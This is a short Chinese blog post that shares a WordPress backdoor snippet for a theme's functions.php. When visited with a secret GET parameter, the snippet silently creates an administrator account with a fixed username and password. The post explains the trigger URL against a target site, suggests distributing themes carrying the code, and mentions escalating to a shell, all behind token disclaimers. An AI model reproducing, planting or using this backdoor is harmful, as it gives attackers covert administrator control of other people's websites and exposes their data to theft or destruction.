版权归作者所有,转载请注明出处
一段代码让你的博客从此毫无毫安全感-WP后门代码
以前大家是不是总是听说过程序后门啦,网站后门啦之类的。
其实只要在你的主题里添加一段代码,你的博客账号,就从此呵呵了。想想太邪恶了,首先我先声明下,我分享的绝无,不信你们自己看,我没那么邪恶的。
//一段代码让你的博客从此毫无毫安全感
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'exehack', 'exehack' ); //默认的后台登录帐号密码:exehack
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
这么一段代码加入主题的functions.php中,对方的网站就无处藏身了。
然后,你再加点别的,提示下对方正在用你的主题,在functions.php里或其他地方再加个链接触发就好了。然后,你只需要……就可以呵呵呵了!太邪恶了……
但是小残不建议这么干,请自觉使用!
使用方法:打开https://目标.com/?backdoor=ihuan 如果在二级目录就加个二级。
然后,你就可以使用你的密码来登陆他的后台了,正常登陆即可,管理员权限,也就是说,你甚至可以shell。具体不多说,自己百度。没办法,WP太强大了!!!超简单拿权。
我这里默认设置的账号密码是 账号:exehack 密码:exehack 就这样了,别做坏事!!!!!
但是删数据库、放黑页不是我们这些“三好学生”该干的。请收好您的好奇心!
